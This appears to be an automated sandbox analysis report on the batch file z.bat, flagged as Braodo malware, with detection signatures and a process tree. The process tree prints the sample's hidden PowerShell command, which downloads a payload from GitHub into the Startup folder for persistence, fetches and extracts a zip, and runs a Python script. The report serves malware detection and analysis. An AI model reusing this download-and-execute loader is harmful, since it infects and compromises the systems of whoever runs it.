Edit tour
Windows
Analysis Report
z.bat
Overview
General Information
| Sample name: | z.bat |
| Analysis ID: | 1585920 |
| MD5: | 8f475fa1eeb043ac72c591e9b96b95d4 |
| SHA1: | 16402f3f80b1a5781c4926d0fb1c7f93be1ada86 |
| SHA256: | a010bdb6a7d927d4af9a66c224b18e57f9ad299e17f6330947153f222475de1e |
| Tags: | batBraodoroukistluser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
Abobus Obfuscator, Braodo
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Drops script or batch files to the startup folder
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 7260 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\z.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7268 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 7340 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7312 cmdline: powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //github.c om/roukist l/ud/raw/m ain/ud.bat ', 'C:\Use rs\user\Ap pData\Roam ing\\Micro soft\\Wind ows\\Start Menu\\Pro grams\\Sta rtup\\Wind owSafety.b at');[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //github.c om/roukist l/dcm2/raw /main/Docu ment.zip', 'C:\Users \Public\Do cument.zip '); Add-Ty pe -Assemb lyName Sys tem.IO.Com pression.F ileSystem; [System.I O.Compress ion.ZipFil e]::Extrac tToDirecto ry('C:/Use rs/Public/ Document.z ip', 'C:/U sers/Publi c/Document '); Start- Sleep -Sec onds 1; C: \Users\Pub lic\Docume nt\python C:\Users\P ublic\Docu ment\Lib\s im.py; del C:/Users/ Public/Doc ument.zip" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
python.exe (PID: 4100 cmdline: "C:\Users\ Public\Doc ument\pyth on.exe" C: \Users\Pub lic\Docume nt\Lib\sim .py MD5: A7F3026E4CF239F0A24A021751D17AE2) - cmd.exe (PID: 1792 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 7272 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cmd.exe (PID: 7696 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\Microso ft\Windows \Start Men u\Programs \Startup\W indowSafet y.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
chcp.com (PID: 7748 cmdline: chcp.com 4 37 MD5: 33395C4732A49065EA72590B14B64F32) - findstr.exe (PID: 7764 cmdline:
findstr /L /I set "C :\Users\us er\AppData \Roaming\M icrosoft\W indows\Sta rt Menu\Pr ograms\Sta rtup\Windo wSafety.ba t" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7780 cmdline:
findstr /L /I goto " C:\Users\u ser\AppDat a\Roaming\ Microsoft\ Windows\St art Menu\P rograms\St artup\Wind owSafety.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7796 cmdline:
findstr /L /I echo " C:\Users\u ser\AppDat a\Roaming\ Microsoft\ Windows\St art Menu\P rograms\St artup\Wind owSafety.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7812 cmdline:
findstr /L /I pause "C:\Users\ user\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\Win dowSafety. bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - find.exe (PID: 7828 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - cmd.exe (PID: 7844 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 7860 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - cmd.exe (PID: 7880 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 7900 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "C:\Us ers\Public \Document\ python C:\ Users\Publ ic\Documen t\Lib\sim. py" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||